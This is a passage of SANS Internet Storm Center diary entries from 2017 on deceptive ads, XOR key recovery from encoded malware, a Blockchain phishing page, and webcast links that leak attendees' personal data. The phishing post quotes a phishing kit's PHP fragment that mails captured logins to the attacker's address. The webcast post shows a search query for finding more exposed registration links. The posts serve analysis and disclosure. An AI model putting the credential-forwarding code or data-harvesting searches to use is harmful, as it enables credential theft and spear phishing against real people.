The ads continued to be displayed on my site. A business day later, I received a manual reply to my initial question:

Hi Johannes
Thank you for reaching out to us. 

Our Design team is working these days on the diversity of our ads. 

We are committed to achieve the highest performance as possible for you. Therefore, the ads you see today are the best performing ones on your traffic. 

You can remove some of them from your site but note that it might affect your results.

I still receive exclusively deceptive ads from RevenueHits. However, at least the results are not that bad. RevenueHits would pay me $0.36 for the one "click through" it counted. I haven't set up payment details with them and have no intentions of claiming the prize ;-)

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute
STI|Twitter|

1 Comments

Published: 2017-06-06

Malware and XOR - Part 2

In part 1, I gave some examples to recover XOR keys from encoded executables if we knew some of the content of the unencoded file (known plaintext attack).

In this part, I give some examples to automate this process using my xor-kpa tool.

xor-kpa.py takes 2 files as input: the first file contains the plaintext, and the second file the encoded file. We are going to search for string "This program cannot be run in DOS mode". So we should put this string in a file and use it as input, but because I often use this string, xor-kpa also has this string as predefined plaintext: dos. This plaintext can be selected with option -n:

xor-kpa displays some potential keys, in ascending order of extra characters.

Value Key is the recovered key, and Key (hex) is the hexadecimal representation of the key (in case the key would not be printable).

Keystream is the keystream, from which xor-kpa extracted the key by looking for repeating strings.

Extra is the difference between the length of the keystream and the length of the key. If this is just one character, the proposed key is very unlikely to be the encoding key. Output can be filtered by requiring a minimum value for extra by using option -e.

Divide is the number of times the key is present in the keystream.

And counts reports the number of times the same key was recovered at different positions in the encoded file.

So by using this known plaintext (This program cannot be run in DOS mode) with the encoded file, xor-kpa proposes a number of keys. In this example, the key with the highest number of extra characters is the actual encoding key (Password).

Another way to recover the key we saw yesterday, is looking for sequences of null bytes (0x00) which have been encoded. xor-kpa.py can do this too, by giving 000000000000... as plaintext. We could create a file containing null bytes, but it's also possible to provide the plaintext in hex on the command line using notation #h#:

As this can be long to type, we can also use notation #e# to instruct xor-kpa to build a sequence by repetition. Here we created a sequence of 256 bytes with value zero (0x00):

The key was recovered, and the count is very high, so it's very likely that the executable contains sequences of 0x00 bytes even longer than 256 bytes.

Another known plaintext that can be used in executables with an embedded manifest (as resource), is PADDINGXX:

Here we use a sequence of ten times the string PADDINGXX as known plaintext:

Please post a comment is you have ideas for other known plaintexts in executables.

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

1 Comments

Published: 2017-06-05

Malware and XOR - Part 1

Malware authors often encode their malicious payload, to avoid detection and make analysis more difficult.

I regurlarly see payloads encoded with the XOR function. Often, they will use a sequence of bytes as encoding key. For example, let's take Password as encoding key. Then the first byte of the payload is XORed with the first byte of the key (P), the second byte of the payload is XORed with the second byte of the key (a), and so on until all bytes of the key have been used. And then we start again with the first byte of the key: the ninth byte of the payload is XORed with the first byte of the key (P), ...

Let's see what this gives with a Windows executable (a PE file), like this one:

The XOR function has some interesting properties for us analysts. XOR a byte with 0x00 (zero), and you get the same byte: XOR with 0x00 is the identity function (f(x) = x).

Since a normal PE file has many sequences of 0x00 bytes, an XOR encoded PE file will contain the encoding key, like here:

So just by opening a XOR encoded PE file with a binary editor, we can see the repeating key, provided that the key is smaller than the sequences of 0x00 bytes.

Second interesting property of the XOR function: if you XOR the original file (cleartext) with the encoded file (ciphertext), you get the key (or to be more precise, the keystream).

Let's take another example. We know that in many PE files, you can find the string "This program can not be run in DOS mode." in the MZ header (or something similar). Here is this encoded string in the encoded PE file:

If we XOR this encoded string with the unencoded string, we obtain the key:

So if we have the encoded file, and the partially unencoded file, we can also recover the key, provided again that the key is smaller than the unencoded text, and that we know where to line-up the encoded and unencoded text.

In a next diary entry, I will show a tool to automate this analysis process.

 

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

2 Comments

Published: 2017-06-02

Phishing Campaigns Follow Trends

Those phishing emails that we receive every day in our mailboxes are often related to key players in different fields:

Internet actors Google, Yahoo!, Facebook, ...
Software or manufacturers Apple, Microsoft, Adobe, ...
Financial Services Paypal, BoA, <name your preferred bank>, ...
Services DHL, eBay, ...

But the landscape of online services is ever changing and new actors (and more precisely their customers) become new interesting targets. Yesterday, while hunting, I found for the first time a phishing page trying to lure the Bitcoin operator: BlockChain. Blockchain[1] is a key player in the management of digital assets. The fake[2] page looked like this:

In the mean time, the /block part of the website has been already shut down. Probably via the available webshell that was installed in the server:

Hopefully, the webshell isn't available anymore. But, it was possible to browse the PHP code and to gather more information about the guy behind this phishing page:

$from = "From: b <hacker@forever.org>\n";
$from .= "MIME-Version: 1.0\r\n";
$from .= "Content-Type: text/html; charset=ISO-8859-1\r\n";
if(@$_GET['accedi']=='login'){
    mail("carlosromero19871@gmail.com", $subj, $msg1, $from);
    header( "Location: richiesta_otp.html" );
}else{

Note that the login procedure on BlockChain is extremely strong: 2FA authentication and one-time link is sent via email to approve all login attempts. Be sure that activate them if you're a BlockChain customer.

The fact that Bitcoins, the digital currency, is getting more and more popular makes it a new interesting target for attackers. And this is also the case in corporate environments: There is a trend in companies that make a reserve of Bitcoins to prevent possible Ransomware attacks![3]

[1] https://www.blockchain.com
[2] http://klimatika.com.ua/block/
[3] https://www.technologyreview.com/s/601643/companies-are-stockpiling-bitcoin-to-pay-off-cybercriminals/

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

2 Comments

Published: 2017-06-01

Sharing Private Data with Webcast Invitations

Last week, at a customer, we received a forwarded email in a shared mailbox. It was somebody from another department that shared an invitation for a webcast “that could be interesting for you, guys!”. This time, no phishing attempt, no malware, just a regular email sent from a well-known security vendor. A colleague was interested in the webcast and clicked on the registration link. He was redirected to a page and was surprised to see all the fields already prefilled with the personal details of the original recipient:

  • Name
  • Organization
  • Email
  • Direct phone number

The link has this format:

http://go.<redacted>.com/CZL00H0wd04C0hkE140jP06

When you visit this link, based on the URI, it expands to the complete registration URL. Even if invitations are usually nominative, people share often webcast invitations with peers who can be located internally, in restricted groups or... the wild Internet (forums, mailing lists, etc). Just for the story, all communications occurred via HTTP.

It was tempting to search on Google for similar URLs:

intext:"go.<redacted>.com/"

I found 31 hits containing an URL of the same format. Let’s test some of them… The online form for the other webcast session was indeed prefilled but... with the same values (the one of the first colleague). Hmmm… Let’s see if we have some cookies maybe? Yes, we have! Let’s clear them, refresh the page and the URL decodes personal details of the attendee:

After more investigation, I found some links of the same format posted on Twitter:

Such information are a gold mine to set up a spear phishing attack! The attacker knows your details, your interests in the <vendor> products and that you attended a webinar on a specific date. Keep this in mind when sharing invitations outside a restricted audience!

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

2 Comments